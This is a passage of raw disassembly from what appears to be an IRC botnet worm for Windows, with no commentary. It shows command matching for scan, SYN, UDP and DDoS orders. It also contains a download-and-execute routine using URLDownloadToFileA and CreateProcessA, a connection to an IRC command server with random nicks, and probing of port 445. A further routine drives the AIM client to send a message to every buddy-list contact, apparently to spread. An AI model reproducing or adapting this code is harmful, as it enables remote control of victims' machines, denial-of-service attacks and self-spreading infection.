movzx eax, word ptr [ebp-4]
push eax
lea eax, [ebp-5Ch]
push eax
push offset a_16sHu_16sHu_2 ; "[%.16s:%hu->%.16s:%hu] \"%.256s\""
lea eax, [ebp-1E0h]
push eax
call dword_401104 ; wsprintfA
add esp, 1Ch
lea eax, [ebp-1E0h]
push eax
call sub_402C53
loc_404C3D: ; CODE XREF: MEW:00404BAC�j
jmp loc_4049D8
; ---------------------------------------------------------------------------
loc_404C42: ; CODE XREF: MEW:004049DF�j
push dword ptr [ebp-48h]
call dword_40108C ; GlobalFree
xor eax, eax
locret_404C4D: ; CODE XREF: MEW:00404936�j
; MEW:0040495A�j ...
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C51 proc near ; CODE XREF: MEW:00404BA4�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
mov [ebp+var_38], offset a_332? ; "*:*.* 332 * #* :?* *"
mov [ebp+var_34], offset aPrivmsg? ; "*PRIVMSG * :?* *"
mov [ebp+var_30], offset a?login ; "* :?login * *"
mov [ebp+var_2C], offset a?set ; "* :?set * * *"
mov [ebp+var_28], offset a?Scan ; "* :?*scan* *"
mov [ebp+var_24], offset a?Syn ; "* :?*syn* *"
mov [ebp+var_20], offset a?Udp ; "* :?*udp* *"
mov [ebp+var_1C], offset a?Ddos ; "* :?*ddos* *"
mov [ebp+var_18], offset aUser? ; "USER ?* "
mov [ebp+var_14], offset aPass? ; "PASS ?* "
mov [ebp+var_10], offset aOper?? ; "OPER ?* ?* *"
mov [ebp+var_C], offset aJoin ; "JOIN #* *"
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_404CBC
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_404C51:loc_404CDF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CBC: ; CODE XREF: sub_404C51+62�j
mov eax, [ebp+var_4]
cmp [ebp+eax*4+var_38], 0
jz short loc_404CE1
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_38]
call sub_403E5B
cmp eax, 1
jnz short loc_404CDF
xor eax, eax
inc eax
jmp short locret_404CE3
; ---------------------------------------------------------------------------
loc_404CDF: ; CODE XREF: sub_404C51+87�j
jmp short loc_404CB5
; ---------------------------------------------------------------------------
loc_404CE1: ; CODE XREF: sub_404C51+73�j
xor eax, eax
locret_404CE3: ; CODE XREF: sub_404C51+8C�j
leave
retn 4
sub_404C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CE7 proc near ; CODE XREF: sub_403062+316�p
var_3AC = dword ptr -3ACh
var_3A8 = byte ptr -3A8h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_110 = byte ptr -110h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 218h
and [ebp+var_218], 0
mov eax, [ebp+arg_4]
mov [ebp+var_214], eax
mov eax, [ebp+arg_8]
mov [ebp+var_210], eax
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_20C]
push eax
call dword_4010BC ; lstrcpynA
lea eax, [ebp+var_108]
push eax
push 0
push offset byte_401C65
push offset a_ ; "."
call dword_401094 ; GetTempFileNameA
push 0
push 0
lea eax, [ebp+var_218]
push eax
push offset loc_404D6C
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_404D68
loc_404D55: ; CODE XREF: sub_404CE7+7F�j
cmp [ebp+var_218], 0
jnz short locret_404D68
push 8
call dword_4010DC ; Sleep
jmp short loc_404D55
; ---------------------------------------------------------------------------
locret_404D68: ; CODE XREF: sub_404CE7+6C�j
; sub_404CE7+75�j
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_404D6C: ; DATA XREF: sub_404CE7+5B�o
push ebp
mov ebp, esp
sub esp, 3ACh
push offset aUrlmon_dll ; "urlmon.dll"
call dword_401068 ; LoadLibraryA
mov [ebp+var_224], eax
cmp [ebp+var_224], 0
jz short loc_404DAF
push offset aUrldownloadtof ; "URLDownloadToFileA"
push [ebp+var_224]
call dword_401064 ; GetProcAddress
mov [ebp+var_3AC], eax
cmp [ebp+var_3AC], 0
jnz short loc_404DB6
loc_404DAF: ; CODE XREF: sub_404CE7+A6�j
xor eax, eax
jmp locret_404EFE
; ---------------------------------------------------------------------------
loc_404DB6: ; CODE XREF: sub_404CE7+C6�j
push 214h
push [ebp+arg_0]
lea eax, [ebp+var_220]
push eax
call sub_40392B
mov eax, [ebp+arg_0]
mov dword ptr [eax], 1
call dword_40106C ; GetCurrentThreadId
mov [ebp+var_4], eax
cmp [ebp+var_218], 0
jnz short loc_404E17
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_4]
push offset aDl08x_180sTo_1 ; "[dl:%08x] %.180s to %.180s"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404E17: ; CODE XREF: sub_404CE7+FC�j
push 0
push 0
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_214]
push eax
push 0
call [ebp+var_3AC]
test eax, eax
jnz loc_404ECF
push offset aD ; "d"
push offset dword_401600
push 0
push 0
push 28h
push 0
push 0
push 0
lea eax, [ebp+var_110]
push eax
push 0
call dword_4010A8 ; CreateProcessA
cmp eax, 1
jnz short loc_404EA0
cmp [ebp+var_218], 0
jnz short loc_404E90
push [ebp+var_4]
push offset aDl08x ; "[dl:%08x] :)"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404E90: ; CODE XREF: sub_404CE7+183�j
cmp [ebp+var_21C], 1
jnz short loc_404E9E
call sub_4027AF
loc_404E9E: ; CODE XREF: sub_404CE7+1B0�j
jmp short loc_404ECD
; ---------------------------------------------------------------------------
loc_404EA0: ; CODE XREF: sub_404CE7+17A�j
cmp [ebp+var_218], 0
jnz short loc_404ECD
push [ebp+var_4]
push offset aDl08xExec ; "[dl:%08x] :( exec"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404ECD: ; CODE XREF: sub_404CE7:loc_404E9E�j
; sub_404CE7+1C0�j
jmp short loc_404EFC
; ---------------------------------------------------------------------------
loc_404ECF: ; CODE XREF: sub_404CE7+14C�j
cmp [ebp+var_218], 0
jnz short loc_404EFC
push [ebp+var_4]
push offset aDl08xDl ; "[dl:%08x] :( dl"
lea eax, [ebp+var_3A8]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_3A8]
push eax
call sub_402C53
loc_404EFC: ; CODE XREF: sub_404CE7:loc_404ECD�j
; sub_404CE7+1EF�j
xor eax, eax
locret_404EFE: ; CODE XREF: sub_404CE7+CA�j
leave
retn 4
sub_404CE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F02 proc near ; CODE XREF: sub_403062+2C2�p
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_C = word ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 50h
cmp dword_40168C, 0
jnz short loc_404F16
jmp locret_404FBB
; ---------------------------------------------------------------------------
loc_404F16: ; CODE XREF: sub_404F02+D�j
push 20h
push [ebp+arg_0]
call sub_40395A
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404F2E
jmp locret_404FBB
; ---------------------------------------------------------------------------
loc_404F2E: ; CODE XREF: sub_404F02+25�j
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 40h
push [ebp+arg_0]
lea eax, [ebp+var_4C]
push eax
call dword_4010BC ; lstrcpynA
and [ebp+var_C], 0
jmp short loc_404F58
; ---------------------------------------------------------------------------
loc_404F51: ; CODE XREF: sub_404F02+81�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F58: ; CODE XREF: sub_404F02+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_404F85
movzx eax, [ebp+var_C]
imul eax, 0Ah
mov [ebp+var_C], ax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
sub eax, 30h
movzx eax, ax
movzx ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], cx
jmp short loc_404F51
; ---------------------------------------------------------------------------
loc_404F85: ; CODE XREF: sub_404F02+5E�j
and [ebp+var_50], 0
and dword_40168C, 0
push 0
push 0
lea eax, [ebp+var_50]
push eax
push offset loc_40501F
push 0
push 0
call dword_4010B4 ; CreateThread
test eax, eax
jz short locret_404FBB
loc_404FAB: ; CODE XREF: sub_404F02+B7�j
cmp [ebp+var_50], 0
jnz short locret_404FBB
push 8
call dword_4010DC ; Sleep
jmp short loc_404FAB
; ---------------------------------------------------------------------------
locret_404FBB: ; CODE XREF: sub_404F02+F�j
; sub_404F02+27�j ...
leave
retn 4
sub_404F02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FBF proc near ; CODE XREF: sub_403062:loc_40332E�p
push ebp
mov ebp, esp
mov dword_40168C, 1
pop ebp
retn
sub_404FBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FCE proc near ; CODE XREF: sub_403062+2E8�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
cmp dword_40168C, 1
jnz short loc_404FE2
jmp short locret_40501B
; ---------------------------------------------------------------------------
loc_404FE2: ; CODE XREF: sub_404FCE+10�j
push [ebp+arg_0]
push offset a_500s ; "%.500s\n"
lea eax, [ebp+var_200]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp+var_204], eax
push 0
push [ebp+var_204]
lea eax, [ebp+var_200]
push eax
push dword_4014D0
call dword_401130 ; send
locret_40501B: ; CODE XREF: sub_404FCE+12�j
leave
retn 4
sub_404FCE endp
; ---------------------------------------------------------------------------
loc_40501F: ; DATA XREF: sub_404F02+96�o
push ebp
mov ebp, esp
sub esp, 5B0h
push esi
push edi
mov esi, [ebp+8]
push 11h
pop ecx
lea edi, [ebp-598h]
rep movsd
movsw
mov eax, [ebp+8]
mov dword ptr [eax], 1
call dword_4010A4 ; GetTickCount
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
and eax, 3
add eax, 5
mov [ebp-54Ch], eax
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
and eax, 3
add eax, 4
mov [ebp-4], eax
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
and eax, 3
add eax, 4
mov [ebp-28h], eax
call dword_4010A4 ; GetTickCount
mov [ebp-5A0h], eax
and dword ptr [ebp-24h], 0
jmp short loc_4050B4
; ---------------------------------------------------------------------------
loc_4050AD: ; CODE XREF: MEW:004050F8�j
mov eax, [ebp-24h]
inc eax
mov [ebp-24h], eax
loc_4050B4: ; CODE XREF: MEW:004050AB�j
mov eax, [ebp-24h]
cmp eax, [ebp-54Ch]
jnb short loc_4050FA
mov eax, [ebp-5A0h]
xor eax, 96F050F2h
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp-24h]
mov [ebp+eax-548h], dl
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
jmp short loc_4050AD
; ---------------------------------------------------------------------------
loc_4050FA: ; CODE XREF: MEW:004050BD�j
mov eax, [ebp-24h]
mov byte ptr [ebp+eax-548h], 0
and dword ptr [ebp-24h], 0
jmp short loc_405112
; ---------------------------------------------------------------------------
loc_40510B: ; CODE XREF: MEW:00405153�j
mov eax, [ebp-24h]
inc eax
mov [ebp-24h], eax
loc_405112: ; CODE XREF: MEW:00405109�j
mov eax, [ebp-24h]
cmp eax, [ebp-4]
jnb short loc_405155
mov eax, [ebp-5A0h]
xor eax, 78D6BA83h
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp-24h]
mov [ebp+eax-5B0h], dl
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
jmp short loc_40510B
; ---------------------------------------------------------------------------
loc_405155: ; CODE XREF: MEW:00405118�j
mov eax, [ebp-24h]
mov byte ptr [ebp+eax-5B0h], 0
and dword ptr [ebp-24h], 0
jmp short loc_40516D
; ---------------------------------------------------------------------------
loc_405166: ; CODE XREF: MEW:004051AE�j
mov eax, [ebp-24h]
inc eax
mov [ebp-24h], eax
loc_40516D: ; CODE XREF: MEW:00405164�j
mov eax, [ebp-24h]
cmp eax, [ebp-28h]
jnb short loc_4051B0
mov eax, [ebp-5A0h]
xor eax, 0D9503521h
mov [ebp-5A0h], eax
mov eax, [ebp-5A0h]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp-24h]
mov [ebp+eax-138h], dl
mov eax, [ebp-5A0h]
shr eax, 1
mov [ebp-5A0h], eax
jmp short loc_405166
; ---------------------------------------------------------------------------
loc_4051B0: ; CODE XREF: MEW:00405173�j
mov eax, [ebp-24h]
mov byte ptr [ebp+eax-138h], 0
push 6
push 1
push 2
call dword_401160 ; socket
mov dword_4014D0, eax
cmp dword_4014D0, 0FFFFFFFFh
jnz short loc_4051DC
xor eax, eax
jmp loc_40538E
; ---------------------------------------------------------------------------
loc_4051DC: ; CODE XREF: MEW:004051D3�j
mov word ptr [ebp-18h], 2
push dword ptr [ebp-554h]
call dword_40110C ; ntohs
mov [ebp-16h], ax
lea eax, [ebp-594h]
push eax
call dword_40111C ; inet_addr
mov [ebp-14h], eax
push 10h
lea eax, [ebp-18h]
push eax
push dword_4014D0
call dword_40112C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_405220
xor eax, eax
jmp loc_40538E
; ---------------------------------------------------------------------------
loc_405220: ; CODE XREF: MEW:00405217�j
lea eax, [ebp-138h]
push eax
lea eax, [ebp-594h]
push eax
lea eax, [ebp-5B0h]
push eax
push offset aUser_16s_16s_1 ; "USER %.16s \"\" \"%.16s\" %.16s\n"
lea eax, [ebp-128h]
push eax
call dword_401104 ; wsprintfA
add esp, 14h
mov [ebp-550h], eax
push 0
push dword ptr [ebp-550h]
lea eax, [ebp-128h]
push eax
push dword_4014D0
call dword_401130 ; send
lea eax, [ebp-548h]
push eax
push offset aNick_16s ; "NICK %.16s\n"
lea eax, [ebp-128h]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp-550h], eax
push 0
push dword ptr [ebp-550h]
lea eax, [ebp-128h]
push eax
push dword_4014D0
call dword_401130 ; send
and dword ptr [ebp-8], 0
loc_4052AC: ; CODE XREF: MEW:loc_40537B�j
cmp dword_40168C, 0
jnz loc_405380
push 0
mov eax, 400h
sub eax, [ebp-8]
push eax
mov eax, [ebp-8]
lea eax, [ebp+eax-538h]
push eax
push dword_4014D0
call dword_40113C ; recv
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0
jle loc_405380
mov eax, [ebp-8]
add eax, [ebp-1Ch]
mov [ebp-8], eax
mov eax, [ebp-8]
mov byte ptr [ebp+eax-538h], 0
lea eax, [ebp-538h]
mov [ebp-59Ch], eax
loc_405308: ; CODE XREF: MEW:loc_405375�j
mov eax, [ebp-59Ch]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_405377
push 0Dh
push dword ptr [ebp-59Ch]
call sub_40395A
mov [ebp-20h], eax
cmp dword ptr [ebp-20h], 0
jz short loc_405349
mov eax, [ebp-20h]
mov byte ptr [eax], 0
push dword ptr [ebp-59Ch]
call sub_405394
mov eax, [ebp-20h]
inc eax
inc eax
mov [ebp-59Ch], eax
jmp short loc_405375
; ---------------------------------------------------------------------------
loc_405349: ; CODE XREF: MEW:00405329�j
mov eax, [ebp-8]
lea eax, [ebp+eax-538h]
sub eax, [ebp-59Ch]
mov [ebp-8], eax
mov eax, [ebp-8]
inc eax
push eax
push dword ptr [ebp-59Ch]
lea eax, [ebp-538h]
push eax
call sub_40392B
jmp short loc_40537B
; ---------------------------------------------------------------------------
loc_405375: ; CODE XREF: MEW:00405347�j
jmp short loc_405308
; ---------------------------------------------------------------------------
loc_405377: ; CODE XREF: MEW:00405313�j
and dword ptr [ebp-8], 0
loc_40537B: ; CODE XREF: MEW:00405373�j
jmp loc_4052AC
; ---------------------------------------------------------------------------
loc_405380: ; CODE XREF: MEW:004052B3�j
; MEW:004052E2�j
push dword_4014D0
call dword_401140 ; closesocket
xor eax, eax
loc_40538E: ; CODE XREF: MEW:004051D7�j
; MEW:0040521B�j
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405394 proc near ; CODE XREF: MEW:00405337�p
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_4053D1
push 20h
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40395A
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4053C2
jmp locret_40553B
; ---------------------------------------------------------------------------
loc_4053C2: ; CODE XREF: sub_405394+27�j
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp short loc_4053D7
; ---------------------------------------------------------------------------
loc_4053D1: ; CODE XREF: sub_405394+12�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
loc_4053D7: ; CODE XREF: sub_405394+3B�j
push 20h
push [ebp+var_8]
call sub_40395A
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4053F1
jmp locret_40553B
; ---------------------------------------------------------------------------
db 0EBh
db 0Dh
; ---------------------------------------------------------------------------
loc_4053F1: ; CODE XREF: sub_405394+54�j
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push offset aPing ; "PING"
push [ebp+var_8]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz short loc_40544E
push [ebp+var_4]
push offset aPong_500s ; "PONG %.500s\r\n"
lea eax, [ebp+var_208]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp+var_20C], eax
push 0
push [ebp+var_20C]
lea eax, [ebp+var_208]
push eax
push dword_4014D0
call dword_401130 ; send
jmp locret_40553B
; ---------------------------------------------------------------------------
loc_40544E: ; CODE XREF: sub_405394+7A�j
push offset a433 ; "433"
push [ebp+var_8]
call dword_4010AC ; lstrcmpA
test eax, eax
jnz locret_40553B
call dword_4010A4 ; GetTickCount
mov [ebp+var_228], eax
mov eax, [ebp+var_228]
and eax, 3
add eax, 5
mov [ebp+var_224], eax
call dword_4010A4 ; GetTickCount
mov [ebp+var_228], eax
and [ebp+var_210], 0
jmp short loc_4054A4
; ---------------------------------------------------------------------------
loc_405497: ; CODE XREF: sub_405394+15A�j
mov eax, [ebp+var_210]
inc eax
mov [ebp+var_210], eax
loc_4054A4: ; CODE XREF: sub_405394+101�j
mov eax, [ebp+var_210]
cmp eax, [ebp+var_224]
jnb short loc_4054F0
mov eax, [ebp+var_228]
xor eax, 54287D75h
mov [ebp+var_228], eax
mov eax, [ebp+var_228]
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp+var_210]
mov [ebp+eax+var_220], dl
mov eax, [ebp+var_228]
shr eax, 1
mov [ebp+var_228], eax
jmp short loc_405497
; ---------------------------------------------------------------------------
loc_4054F0: ; CODE XREF: sub_405394+11C�j
mov eax, [ebp+var_210]
mov [ebp+eax+var_220], 0
lea eax, [ebp+var_220]
push eax
push offset aNick_16s ; "NICK %.16s\n"
lea eax, [ebp+var_208]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
mov [ebp+var_20C], eax
push 0
push [ebp+var_20C]
lea eax, [ebp+var_208]
push eax
push dword_4014D0
call dword_401130 ; send
locret_40553B: ; CODE XREF: sub_405394+29�j
; sub_405394+56�j ...
leave
retn 4
sub_405394 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40553F proc near ; CODE XREF: sub_403062+2A6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push 0
push offset a_oscar_statusn ; "_Oscar_StatusNotify"
call dword_4010EC ; FindWindowA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_405560
jmp locret_405724
; ---------------------------------------------------------------------------
loc_405560: ; CODE XREF: sub_40553F+1A�j
push 0
push 4E23h
push 111h
push [ebp+var_8]
call dword_4010FC ; SendMessageA
push 0
push [ebp+var_8]
call dword_4010F8 ; GetWindowThreadProcessId
mov [ebp+var_1C], eax
and [ebp+var_14], 0
loc_405587: ; CODE XREF: sub_40553F:loc_4055FB�j
push 0
push offset a32770 ; "#32770"
push [ebp+var_14]
push 0
call dword_4010F4 ; FindWindowExA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4055A7
jmp locret_405724
; ---------------------------------------------------------------------------
loc_4055A7: ; CODE XREF: sub_40553F+61�j
push 0
push [ebp+var_14]
call dword_4010F8 ; GetWindowThreadProcessId
cmp eax, [ebp+var_1C]
jnz short loc_4055FB
push 0
push offset a32770 ; "#32770"
push 0
push [ebp+var_14]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4055D7
jmp locret_405724
; ---------------------------------------------------------------------------
loc_4055D7: ; CODE XREF: sub_40553F+91�j
push 0
push offset a_oscar_tree ; "_Oscar_Tree"
push 0
push [ebp+var_C]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_4055F9
jmp locret_405724
; ---------------------------------------------------------------------------
db 0EBh
db 2
; ---------------------------------------------------------------------------
loc_4055F9: ; CODE XREF: sub_40553F+B1�j
jmp short loc_4055FD
; ---------------------------------------------------------------------------
loc_4055FB: ; CODE XREF: sub_40553F+76�j
jmp short loc_405587
; ---------------------------------------------------------------------------
loc_4055FD: ; CODE XREF: sub_40553F:loc_4055F9�j
push 0
push 0
push 18Bh
push [ebp+var_18]
call dword_4010FC ; SendMessageA
mov [ebp+var_10], eax
push 0
push [ebp+var_10]
push 186h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 25h
push 100h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 25h
push 101h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 0
push 18Bh
push [ebp+var_18]
call dword_4010FC ; SendMessageA
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
dec eax
dec eax
mov [ebp+var_4], eax
jmp short loc_40566F
; ---------------------------------------------------------------------------
loc_405668: ; CODE XREF: sub_40553F+16D�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
loc_40566F: ; CODE XREF: sub_40553F+127�j
cmp [ebp+var_4], 0
jl short loc_4056AE
push 0
push [ebp+var_4]
push 186h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 27h
push 100h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 27h
push 101h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
jmp short loc_405668
; ---------------------------------------------------------------------------
loc_4056AE: ; CODE XREF: sub_40553F+134�j
push 0
push 0
push 18Bh
push [ebp+var_18]
call dword_4010FC ; SendMessageA
mov [ebp+var_10], eax
and [ebp+var_4], 0
jmp short loc_4056D0
; ---------------------------------------------------------------------------
loc_4056C9: ; CODE XREF: sub_40553F+1E3�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4056D0: ; CODE XREF: sub_40553F+188�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jge short locret_405724
push 0
push [ebp+var_4]
push 186h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 20h
push 100h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push 0
push 20h
push 101h
push [ebp+var_18]
call dword_4010FC ; SendMessageA
push [ebp+arg_0]
call sub_405728
push 7D0h
call dword_4010DC ; Sleep
jmp short loc_4056C9
; ---------------------------------------------------------------------------
locret_405724: ; CODE XREF: sub_40553F+1C�j
; sub_40553F+63�j ...
leave
retn 4
sub_40553F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405728 proc near ; CODE XREF: sub_40553F+1D3�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
loc_40572E: ; CODE XREF: sub_405728+E9�j
push offset aInstantMessage ; "Instant Message"
push offset aAim_imessage ; "AIM_IMessage"
push 0
push 0
call dword_4010F4 ; FindWindowExA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz locret_405816
and [ebp+var_C], 0
loc_405753: ; CODE XREF: sub_405728:loc_4057AA�j
push 0
push offset aWndate32class ; "WndAte32Class"
push [ebp+var_C]
push [ebp+var_4]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4057AC
push 0
push offset aCbclass ; "CBClass"
push 0
push [ebp+var_C]
call dword_4010F4 ; FindWindowExA
test eax, eax
jz short loc_4057AA
push 0
push offset aAte32class ; "Ate32Class"
push 0
push [ebp+var_C]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_10], eax
push [ebp+arg_0]
push 0
push 0Ch
push [ebp+var_10]
call dword_4010FC ; SendMessageA
loc_4057AA: ; CODE XREF: sub_405728+5B�j
jmp short loc_405753
; ---------------------------------------------------------------------------
loc_4057AC: ; CODE XREF: sub_405728+45�j
and [ebp+var_8], 0
loc_4057B0: ; CODE XREF: sub_405728:loc_405800�j
push 0
push offset a_oscar_iconbtn ; "_Oscar_IconBtn"
push [ebp+var_8]
push [ebp+var_4]
call dword_4010F4 ; FindWindowExA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_405802
push [ebp+var_8]
call dword_401100 ; GetMenu
cmp eax, 199h
jnz short loc_405800
push 0
push 0
push 201h
push [ebp+var_8]
call dword_4010FC ; SendMessageA
push 0
push 0
push 202h
push [ebp+var_8]
call dword_4010FC ; SendMessageA
loc_405800: ; CODE XREF: sub_405728+B2�j
jmp short loc_4057B0
; ---------------------------------------------------------------------------
loc_405802: ; CODE XREF: sub_405728+A2�j
push 0
push 0
push 10h
push [ebp+var_4]
call dword_4010FC ; SendMessageA
jmp loc_40572E
; ---------------------------------------------------------------------------
locret_405816: ; CODE XREF: sub_405728+21�j
leave
retn 4
sub_405728 endp
; ---------------------------------------------------------------------------
loc_40581A: ; DATA XREF: sub_403B95+2A9�o
push ebp
mov ebp, esp
sub esp, 4Ch
push dword ptr [ebp+8]
call sub_40587E
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz short loc_405878
cmp dword_40167C, 0
jnz short loc_405878
cmp dword ptr [ebp-4], 1
jnz short loc_405849
mov dword ptr [ebp-4Ch], offset dword_402598
jmp short loc_405850
; ---------------------------------------------------------------------------
loc_405849: ; CODE XREF: MEW:0040583E�j
mov dword ptr [ebp-4Ch], offset dword_402594
loc_405850: ; CODE XREF: MEW:00405847�j
push dword ptr [ebp-4Ch]
push dword ptr [ebp+8]
call dword_401164 ; inet_ntoa
push eax
push offset dword_402584
lea eax, [ebp-48h]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
lea eax, [ebp-48h]
push eax
call sub_402C53
loc_405878: ; CODE XREF: MEW:0040582F�j
; MEW:00405838�j
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40587E proc near ; CODE XREF: MEW:00405823�p
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_1C], 2
mov [ebp+var_1A], 0BD01h
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
push 6
push 1
push 2
call dword_401160 ; socket
mov [ebp+var_8], eax
push 10h
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
